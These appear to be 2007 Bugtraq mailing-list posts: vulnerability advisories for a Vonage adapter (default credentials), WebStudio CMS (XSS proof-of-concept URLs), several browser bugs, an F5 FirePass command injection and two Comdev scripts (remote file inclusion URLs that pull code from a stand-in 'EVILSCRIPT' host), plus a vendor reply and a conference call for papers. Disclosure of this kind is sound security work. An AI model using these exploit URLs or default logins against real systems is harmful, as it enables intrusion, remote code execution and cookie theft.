Well, I have just played around with it a bit, so I assume this is already
known. A solution might be to use stunnel.

Have Fun :)
Greetz mpeg


Redlevel Advisory #025 - Vonage VoIP Telephone Adapter Default Misconfiguration

2007-06-04 Thread john
Vonage VoIP Telephone Adapter Default Misconfiguration

The Vonage VoIP Telephone Adapter device is, by default, accessible from the 
WLAN/internet. The product ships with the default username of 'user' and 
default password of 'user' to access the administrative backend.

Users are advised to update their passwords immediately. An attacker could
cause a denial-of-service by uploading broken firmware to the device, or by
constantly rebooting the device.

John Martinelli
[EMAIL PROTECTED]

http://RedLevel.org
RedLevel.org Security


Re: Buffer overflow in BusinessMail email server system 4.60.00

2007-06-04 Thread iant
This problem was corrected within 14 days, and a new SMTP server was provided 
on our web site. This was back in 2005, we are now almost TWO YEARS ON, and you 
still claim it is a problem.

You **were** notified of the release of the fix, and we have many other 
confirmations that it is indeed a good fix.

We are now at 4.7 of BusinessMail, and that also still blocks this
"vulnerability", and yet you continue to publish out of date and inaccurate
information as being the truth.

Kindly update your published information as relevant to reflect the true facts 
of this buglet.

You can download an evaluation BusinessMail system from our web site to test
this for yourself if you still do not believe us.

Thank You



WebStudio Multiple XSS Vulnerabilities

2007-06-04 Thread glafkos
Application:  WebStudio CMS

Vendor's URL:  http://www.bdigital.biz

Bug Type: Multiple URL Handling Remote Cross-Site Scripting Vulnerabilities

Exploitation: Remote

Severity: Less Critical 

Solution Status: Unpatched 

Introduction: WebStudio CMS is a web-based CMS system

Google Dork:  "Powered by WebStudio"


Description:

User-supplied input passed via the URL is not properly sanitised before it is 
being returned to the user in index.php?pageid=. This can be exploited to 
execute arbitrary script code in the security context of an affected website, 
as a result the code will be able to access any of the target user's cookies, 
access data recently submitted by the target user via web form to the site, or 
take actions on the site acting as the target user.


PoC:

http://[target]/?pageid=[XSS]
http://[target]/?pageid=-->[XSS]
http://[target]/[EMAIL PROTECTED]
http://[target]/?pageid=http://[target]/?pageid=[XSS]
http://[target]/index.php?pageid=>'>[XSS]
http://[target]/index.php?pageid=[XSS]
http://[target]/index.php?pageid=-->[XSS]
http://[target]/index.php?pageid=http://[target]/index.php?pageid=[XSS]


Solution:

There was no vendor-supplied solution at the time of entry.

Edit source code manually to ensure user-supplied input is correctly sanitised.

Filter malicious characters and character sequences via an HTTP proxy or
firewall with URL filtering capabilities.


Credits:

Glafkos Charalambous
glafkos (at) infosec (dot) org (dot) uk

Information Security Uncensored
InfoSEC.org.uk


Assorted browser vulnerabilities

2007-06-04 Thread Michal Zalewski
Hello,

Will keep it brief. A couple of browser bugs, fresh from the oven, hand
crafted with love:

1) Title    : MSIE page update race condition (CRITICAL)
   Impact   : cookie stealing / setting, page hijacking, memory corruption
   Demo     : http://lcamtuf.coredump.cx/ierace/

   ...aka the bait & switch vulnerability.

   When Javascript code instructs MSIE6/7 to navigate away from a page
   that meets same-domain origin policy (and hence can be scriptually
   accessed and modified by the attacker) to an unrelated third-party
   site, there is a window of opportunity for concurrently executed
   Javascript to perform actions with the permissions for the old page,
   but actual content for the newly loaded page, for example:

 - Read or set victim.document.cookie,

 - Arbitrarily alter document DOM, including changing form submission
   URLs, injecting code,

 - Read or write DOM structures that were not fully initialized,
   prompting memory corruption and browser crash.

   This is tested on MSIE6 and MSIE7, fully patched.

2) Title    : Firefox Cross-site IFRAME hijacking (MAJOR)
   Impact   : keyboard snooping, content spoofing, etc
   Demo     : http://lcamtuf.coredump.cx/ifsnatch/
   Bugzilla : https://bugzilla.mozilla.org/show_bug.cgi?id=382686 [May 30]

   Javascript can be used to inject malicious code, including key-snooping
   event handlers, on pages that rely on IFRAMEs to display contents or
   store state data / communicate with the server.

   This is related to a less severe variant independently reported by
   Ronen Zilberman two weeks earlier (bug 381300).

3) Title    : Firefox file prompt delay bypass (MEDIUM)
   Impact   : non-consensual download or execution of files
   Demo     : http://lcamtuf.coredump.cx/ffclick2/
   Bugzilla : https://bugzilla.mozilla.org/show_bug.cgi?id=376473 [Apr 04]

   A sequence of blur/focus operations can be used to bypass delay timers
   implemented on certain Firefox confirmation dialogs, possibly enabling
   the attacker to download or run files without the user's knowledge or
   consent.

4) Title    : MSIE6 URL bar spoofing (MEDIUM)
   Impact   : mimicking an arbitrary site, possibly including SSL data
   Demo     : http://lcamtuf.coredump.cx/ietrap2/

   MSIE6 vulnerability, similar but unrelated to my earlier onUnload
   entrapment flaw, allows sites to spoof URL bar data.

   MSIE7 is not affected because of certain high-level changes in the
   browser.



S21Sec-035: F5 FirePass command execution vulnerability

2007-06-04 Thread S21sec Labs

##

 - S21Sec Advisory -

##

    Title:   F5 FirePass command execution vulnerability
       ID:   S21SEC-035-en
 Severity:   High - Intrusion
  History:   14.Feb.2007 Vulnerability discovered
             22.Feb.2007 Vendor contacted
    Scope:   Linux's shell Command Execution
Platforms:   Linux based Appliance
   Author:   Leonardo Nve ([EMAIL PROTECTED])
      URL:   http://www.s21sec.com/avisos/s21sec-035-en.txt
  Release:   Public

[ SUMMARY ]

F5's FirePass SSL VPN appliance provides secure access to corporate
applications and data using a standard web browser. Delivering outstanding
performance, scalability, ease-of-use, and end-point security, FirePass
helps increase the productivity of those working from home or on the road
while keeping corporate data secure.


FirePass provides:

* Automatic detection of security compliant systems, preventing infection.
* Automatic integration with the largest number of virus scanning and
  personal firewall solutions in the industry (over 100 different AV &
  Personal Firewall versions).
* Automatic protection from infected file uploads or email attachments.
* Automatic re-routing and quarantine of infected or non-compliant systems
  to a self remediation network - reducing help desk calls.
* A secure workspace, preventing eavesdropping and theft of sensitive data.
* Secure Login with a randomized key entry system, preventing keystroke
  logger snooping.
* Full integration with the FirePass Visual Policy Editor. This enables the
  creation of custom template policies based on the endpoints accessing your
  network and your company's security profile.




[ AFFECTED VERSIONS ]

This vulnerability has been tested in F5 FirePass 4100.


[ DESCRIPTION ]

S21sec has discovered a vulnerability in an F5 FirePass SSL VPN script that
allows the injection of Linux shell commands under some circumstances.
The attacker doesn't need to be logged into the system in order to trigger
the exploit.


The affected script is:

- my.activation.php3

The variable is:

- username


[ WORKAROUND ]

F5 has published a security advisory at
https://tech.f5.com/home/solutions/sol167.html
Additionally, hotfix HF-75705-76003-1 has been issued for supported
versions of FirePass.
You may download this hotfix or later versions of the hotfix from the
F5 Networks Downloads site (https://downloads.f5.com/esd/index.jsp).


[ ACKNOWLEDGMENTS ]

This vulnerability has been discovered and researched by:

- Leonardo Nve <[EMAIL PROTECTED]> S21Sec

With thanks to:

- Alberto Moro <[EMAIL PROTECTED]> S21Sec


[ REFERENCES ]

* F5 Firepass
  http://www.f5.com/products/FirePass/



* S21Sec
  http://www.s21sec.com



BCS'07 Call For Papers

2007-06-04 Thread Jim Geovedi

Dear Bugtraq readers,

The call for papers and conference registration is now open for
BCS'07, our third annual information security & hacking conference.


 From 30 to 31 October 2007, BCS'07 will be held at the Grand Melia
 in Jakarta, Indonesia.


We invite proposals for paper presentations and demonstrations:

Your submission should include:
 1. Name, title, address, email and phone number
 2. Draft of the proposed presentation (in PDF, PowerPoint or Keynote
format), proof of concept for tools and exploits, etc.
 3. Short biography, qualification, occupation, achievement and
affiliations (limit 150 words).
 4. Summary or abstract for your presentation (limit 150 words)
 5. Time (40-60 minutes). Include time for discussion and questions
 6. Technical requirements (video, internet, wireless, audio, etc.)

We do not accept product, service or vendor related presentations.

Please send your proposal to [EMAIL PROTECTED] as soon as possible
and no later than 30 June 2007.

Proposals will be evaluated in the order received; submit early to
maximise your chances of being selected.

Links:
http://www.bellua.net or http://www.bellua.com/bcs/

Pictures from BCS2006:
http://www.bellua.net/asia06.pictures/index.html

Pictures from BCS2005:
http://www.bellua.net/asia05.pictures/index.html

Many thanks,

Jim Geovedi


Comdev eCommerce 4.1 RFI Vulnerability

2007-06-04 Thread johnnytalker
###
#  
# Comdev eCommerce 4.1 RFI Vulnerability
#
###
# Information:-
#
# Scripts:  Comdev eCommerce
# Download: http://www.comdevweb.com/downloadfile.php?product=ECOMM41&url=http://share.comdevweb.com/download/ecommerce-4.1.zip
# Version : 4.1
#
#
# Exploit :
#
# http://website/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=http://EVILSCRIPT.txt?
#
###
#
# Discovered By : [L.T.C]
#
###


Comdev Web Blogger 4.1 RFI Vulnerability

2007-06-04 Thread johnnytalker
###
# 
# Comdev Web Blogger 4.1 RFI Vulnerability
#
###
# Information:-
#
# Scripts:  Comdev Web Blogger
# Download: http://www.comdevweb.com/downloadfile.php?product=BLOGG41&url=http://share.comdevweb.com/download/blogger-4.1.zip
# Version : 4.1
#
#
# Exploit :
#
# http://website/oneadmin/blogger/sampleblogger.php?path[docroot]=http://EVILSCRIPT.txt?
#
###
#
# Discovered By : [L.T.C]
#
###